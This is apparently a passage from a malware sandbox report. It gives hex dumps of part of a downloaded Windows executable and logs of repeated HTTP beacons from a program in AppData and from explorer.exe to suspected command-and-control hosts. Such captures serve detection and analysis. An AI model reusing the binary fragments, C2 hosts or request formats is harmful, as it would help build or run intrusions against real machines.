                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 a8 27 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 0e 01 00 00 92 00 00 00 00 00 00 d0 66 00 00 00 10 00 00 00 20 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 7a 01 00 9c 00 00 00 fc 7a 01 00 50 00 00 00 00 b0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 dc 12 00 00 e0 6e 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 6f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 0c 01 00 00 10 00 00 00 0e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 60 62 00 00 00 20 01 00 00 64 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 17 00 00 00 90 01 00 00 0c 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 b0 01 00 00 02 00 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 12 00 00 00 c0 01 00 00 14 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'cjcjcj8iij8oj8nqjnljirjoBj8kdjckjc`jjbjbjhbjRichcjPEL'e!f @`zzPnpPo@ H.text `.rdata`b d@@.datav@.rsrc@@.reloc@B
                                                                                                                                                                    Feb 8, 2024 19:11:50.926743984 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 e8 6c 01 10 b9 70 98 01 10 e8 4f 48 00 00 68 b0 15 01 10 e8 5c 53 00 00 59 c3 cc
                                                                                                                                                                    Data Ascii: j hlpOHh\SYj hm/Hh<SYjh0mHhpSYjhDmGhRYjh`mGh0RYjhDmGhRY
                                                                                                                                                                    Feb 8, 2024 19:11:50.927220106 CET1286INData Raw: e8 49 47 00 00 8b 7d 9c 8b 45 b0 83 f8 10 72 2b 8d 48 01 8b c7 81 f9 00 10 00 00 72 14 8b 7f fc 83 c1 23 2b c7 83 c0 fc 83 f8 1f 0f 87 98 02 00 00 51 57 e8 07 4b 00 00 83 c4 08 8b 55 98 83 fa 10 72 2c 8b 4d 84 42 8b c1 81 fa 00 10 00 00 72 14 8b
                                                                                                                                                                    Data Ascii: IG}Er+Hr#+QWKUr,MBrI#+dRQJEEPhPV<!]V5@!uuEUE~EfCEEr/MBrI#+
                                                                                                                                                                    Feb 8, 2024 19:11:50.927648067 CET1286INData Raw: a1 70 99 01 10 0f 43 ca 03 c1 3b f0 0f 84 2a 01 00 00 8a 04 33 8d 4d e0 32 06 88 45 ff 8d 45 ff 6a 01 50 c7 45 f0 00 00 00 00 c7 45 f4 0f 00 00 00 c6 45 e0 00 e8 4e 3e 00 00 8d 45 e0 8b d7 50 8d 4d c8 e8 c0 3f 00 00 8b d8 83 c4 04 3b fb 74 65 8b
                                                                                                                                                                    Data Ascii: pC;*3M2EEjPEEEN>EPM?;teOr+ArP#+QPEGG~CfGCCUr(MBrI#+wiRQVEUEE
                                                                                                                                                                    Feb 8, 2024 19:11:51.159878969 CET1286INData Raw: 00 00 0f be 8a c8 6d 01 10 89 14 8b 42 83 fa 40 7c f0 8b 55 ec 33 f6 33 db 8d 7e f8 85 d2 74 41 8b 4d f8 83 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 35 00
                                                                                                                                                                    Data Ascii: mB@|U33~tAM}ECEt'xMP5UMC;rEthP@Ur(MBrI#+wVRQ@UEEEr(MBrI#+wRQN@E_^[]
                                                                                                                                                                    Feb 8, 2024 19:11:51.160233021 CET1286INData Raw: 00 00 00 33 ff 85 c0 0f 84 b8 00 00 00 c7 45 f8 00 00 00 00 c7 45 fc 0f 00 00 00 c6 45 e8 00 3b c7 0f 82 46 01 00 00 2b c7 b9 01 00 00 00 3b c1 0f 42 c8 83 7d 1c 10 8d 45 08 0f 43 45 08 51 03 c7 8d 4d e8 50 e8 32 34 00 00 83 ec 18 8d 45 d0 8b cc
                                                                                                                                                                    Data Ascii: 3EEE;F+;B}ECEQMP24EPd3EPQ3U0r,MBrI#+RQw;EG;HUr(MBrI#+wxRQ
                                                                                                                                                                    Feb 8, 2024 19:11:51.160829067 CET1286INData Raw: 00 83 c4 08 84 db 0f 84 ea 11 00 00 8b 4d f8 c7 45 e0 00 00 00 00 c7 45 e4 0f 00 00 00 c6 45 d0 00 3b cf 0f 82 c3 15 00 00 8d 41 fd 3b c1 0f 42 c8 83 7d fc 10 8d 45 e8 0f 43 45 e8 51 83 c0 03 8d 4d d0 50 e8 2d 2f 00 00 8b 55 fc 83 fa 10 72 2c 8b
                                                                                                                                                                    Data Ascii: MEEE;A;B}ECEQMP-/Ur,MBrI#+~RQ6EuEE~EPfE.jhnAA.O0EEEHE;+;B}
                                                                                                                                                                    Feb 8, 2024 19:11:51.161066055 CET1286INData Raw: 0c f3 ff ff 83 c4 30 c7 45 e0 00 00 00 00 c7 45 e4 0f 00 00 00 c6 45 d0 00 8d 48 ff b8 a8 99 01 10 39 0d b8 99 01 10 0f 42 0d b8 99 01 10 83 3d bc 99 01 10 10 51 0f 43 05 a8 99 01 10 8d 4d d0 50 e8 2a 2a 00 00 8b 0d bc 99 01 10 83 f9 10 72 2e a1
                                                                                                                                                                    Data Ascii: 0EEEH9B=QCMP**r.ArP#+xQP1EU~EfAA9B=RCP)Mt|
                                                                                                                                                                    Feb 8, 2024 19:11:51.163058043 CET1286INData Raw: 1f 0f 87 bb 0b 00 00 52 51 e8 0d 2d 00 00 83 c4 08 83 ec 18 8b cc 68 88 98 01 10 e8 8a 24 00 00 83 ec 18 8b cc 68 c0 99 01 10 e8 7b 24 00 00 8d 4d d0 e8 03 e8 ff ff 8b f0 83 c4 30 81 fe c0 99 01 10 74 7c 8b 0d d4 99 01 10 83 f9 10 72 2e a1 c0 99
                                                                                                                                                                    Data Ascii: RQ-h$h{$M0t|r.ArP#+VQP,~FfFFUr,MBrI#+RQ*,
                                                                                                                                                                    Feb 8, 2024 19:11:51.163480997 CET1286INData Raw: 23 2b c2 83 c0 fc 83 f8 1f 0f 87 d0 06 00 00 8b c2 51 50 e8 fd 27 00 00 83 c4 08 0f 10 45 d0 83 ec 18 8b cc 0f 11 05 f0 99 01 10 f3 0f 7e 45 e0 68 f0 99 01 10 66 0f d6 05 00 9a 01 10 e8 62 1f 00 00 83 ec 18 8b cc 6a 03 68 a4 6e 01 10 c7 41 10 00
                                                                                                                                                                    Data Ascii: #+QP'E~EhfbjhnAA 0EEEH9B=QCMPr.ArP#+QP4'EU
                                                                                                                                                                    Feb 8, 2024 19:11:51.164374113 CET1286INData Raw: fa 18 00 00 8d 4d d0 e8 a2 18 00 00 83 ec 18 8b cc 68 c0 99 01 10 e8 83 1a 00 00 83 ec 18 8b cc 68 94 6e 01 10 e8 34 1a 00 00 e8 cf e3 ff ff 83 c4 30 48 b9 c0 99 01 10 50 6a 00 8d 45 d0 50 e8 ba 16 00 00 50 b9 c0 99 01 10 e8 af 18 00 00 8d 4d d0
                                                                                                                                                                    Data Ascii: Mhhn40HPjEPPMWuEP6hn4MPEPoPdMhhn90HPjEP$PMuE


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    204192.168.2.349983185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:50.719641924 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:50.956379890 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:50 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    205192.168.2.349984185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:51.411776066 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:51.648325920 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:51 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    206192.168.2.349985185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:52.031686068 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:52.268292904 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    207192.168.2.349986185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:52.654647112 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:52.891258955 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    208192.168.2.349987185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:53.326538086 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:53.563317060 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    209192.168.2.349988185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:53.925920963 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:54.164761066 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    210192.168.2.349989185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:55.122782946 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:55.359253883 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    211192.168.2.349990185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:55.792514086 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:56.029392004 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    212192.168.2.349991185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:56.390579939 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:56.627140999 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    213192.168.2.349992185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:57.015455008 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:57.252221107 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    214192.168.2.349993109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:57.187381029 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://fqowpepgthouh.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 130
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:11:57.187427998 CET130OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 40 dd fb
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA .[k,vuH@abfbcUScpUADd3
                                                                                                                                                                    Feb 8, 2024 19:11:57.613450050 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:57 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    215192.168.2.34999491.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:57.524848938 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ofbtpnspwwiuov.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:11:57.524848938 CET156OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 88 de 10 a5
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO:xhKMkiK9K4iIGN#fVu4^*W
                                                                                                                                                                    Feb 8, 2024 19:11:57.797353983 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    216192.168.2.349995185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:57.623497009 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:57.860018015 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


